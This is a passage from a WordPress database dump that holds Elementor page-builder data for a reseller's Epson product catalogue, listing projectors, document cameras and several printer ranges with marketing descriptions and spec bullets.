corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-G7400UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-Z10000U\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p><strong>Document Camera ELPDC21\\u00a0<\\/strong><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(8047,3493,'_elementor_version','2.5.14'),(8050,3494,'_wp_page_template','template-fullwidth.php'),(8051,3494,'_elementor_edit_mode','builder'),(8052,3494,'_elementor_template_type','post'),(8053,3494,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h2>Printers for Work<\\/h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d99a531\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"51d6ae3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f78e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-100\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"96730a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"addc0f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-7711<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2420 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><br>\\n\\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.\\n<ul>\\n \\t<li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li>\\n \\t<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li>\\n \\t<li>Duplex printing up to A3 size<\\/li>\\n \\t<li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li>\\n \\t<li>4.3\\u201d Colour LCD Touch Panel<\\/li>\\n \\t<li>Print, Scan, Copy Fax with ADF<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c71ec36\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EcoTank L3150<\\/strong><\\/h4><p><img class=\\\"wp-image-2421 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L120 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9109035\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":164,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"140f583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson M1100 Printer<\\/strong><\\/h4><p><img class=\\\"wp-image-2423 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e74569a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"e157d4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0c8225a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson AcuLaser C9300N<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2424 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><br>\\n\\nThe Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Speed: Up to 30ppm<\\/li>\\n \\t<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li>\\n \\t<li>Quality prints with new Epson Technologies<\\/li>\\n \\t<li>New print job management features<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ee8d71a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"18\",\"bottom\":\"18\",\"left\":\"18\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2426 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><br>\\n\\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Print speed up to 35ppm<\\/li>\\n \\t<li>Auto-Duplex<\\/li>\\n \\t<li>Ethernet &amp; Epson iPrint<\\/li>\\n \\t<li>2 optional paper cassette tray<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e06a550\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2427 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><br><br>\\n\\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Print speed up to 40 ppm<\\/li>\\n \\t<li>Epson iPrint<\\/li>\\n \\t<li>Ethernet<\\/li>\\n \\t<li>4 optional cassette trays<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3432510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"75\",\"right\":\"75\",\"bottom\":\"75\",\"left\":\"75\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2428 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ecb5d15\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":\"-2\",\"bottom\":\"-2\",\"left\":\"-2\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T88V-i\\u00a0<\\/strong>\\n\\n<img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/h4>\\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\\n<ul>\\n \\t<li>Printing speed of up to 300mm\\/second<\\/li>\\n \\t<li>20 million lines for printer mechanism<\\/li>\\n \\t<li>Up to 2 million for auto-cutter<\\/li>\\n \\t<li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li>\\n \\t<li>Control peripherals easily<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T70II\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><br \\/><br \\/><\\/h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f74e5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4ede29a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/h4><p><br \\/><img class=\\\"wp-image-2431 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"241\\\" height=\\\"175\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"7bcc969\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"561cb4c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":22},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L850 Printer\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2432 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 